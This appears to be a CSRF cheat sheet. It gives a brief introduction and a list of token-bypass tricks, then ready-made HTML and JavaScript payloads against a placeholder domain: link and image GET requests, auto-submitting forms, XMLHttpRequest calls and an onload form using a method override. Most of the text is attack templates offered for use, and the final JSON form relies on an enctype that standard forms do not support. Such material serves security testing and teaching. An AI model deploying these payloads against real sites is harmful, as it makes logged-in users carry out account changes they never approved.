
Introduction

Cross-Site Request Forgery (CSRF) is a vulnerability in which an attacker tricks a user into performing actions on a web application where that user is already authenticated, without the user's knowledge. This can compromise the security of user data and account settings. CSRF is commonly mitigated with anti-CSRF tokens and modern browser security features.

Common Attack Scenarios:

  1. Removing Anti-CSRF Tokens: Attackers manipulate form data to remove or alter the anti-CSRF token that is intended to prevent unauthorized actions.
  2. Spoofing Tokens: If the backend fails to verify the integrity of a CSRF token properly, an attacker may slightly modify the token to bypass the check.
  3. Exploiting Static Token Segments: Attackers take advantage of CSRF tokens that contain predictable or unchanging parts, using those segments to fool the validation process.
  4. Reusing CSRF Tokens: Attackers may capture valid CSRF tokens from legitimate requests and reuse them in unauthorized requests to mimic authentic interactions.

Simple GET Request

<!-- Direct user interaction required -->
<a href="http://[DOMAIN_NAME]/endpoint?parameter=CSRFd">Click here to view!</a>

GET Request Without User Interaction

<!-- Automatically triggers when the page loads -->
<img src="http://[DOMAIN_NAME]/endpoint?parameter=CSRFd" alt="img">

Simple POST Request

<!-- User must click the submit button -->
<form action="http://[DOMAIN_NAME]/endpoint" method="POST">
  <input type="hidden" name="parameter" value="CSRFd">
  <input type="submit" value="Submit Request">
</form>

POST Request Without User Interaction

<!-- Automatically submits on page load -->
<form id="autosubmit" action="http://[DOMAIN_NAME]/endpoint" method="POST">
  <input type="hidden" name="parameter" value="CSRFd">
  <input type="submit" value="Submit Request">
</form>
<script>
  document.getElementById('autosubmit').submit();
</script>

JSON GET Request

<!-- Cross-origin XMLHttpRequest is subject to the browser's CORS policy and may be blocked -->
<script>
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "http://[DOMAIN_NAME]/endpoint");
  xhr.send();
</script>

JSON POST Request

<!-- Using JSON to send data in a POST request -->
<script>
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "http://[DOMAIN_NAME]/endpoint");
  xhr.setRequestHeader("Content-Type", "application/json");
  xhr.send(JSON.stringify({parameter: "CSRFd"}));
</script>

CSRF with JSON Without User Interaction

<!-- Form auto-submits on page load; the _method override is only honoured by frameworks that support it -->
<body onload='document.forms[0].submit()'>
<form action="https://[DOMAIN_NAME]?_method=PUT" method="POST" enctype="application/json">
  <input type="hidden" name='data' value='{"parameter":"newValue"}'>
  <input type="submit" value="Send">
</form>
</body>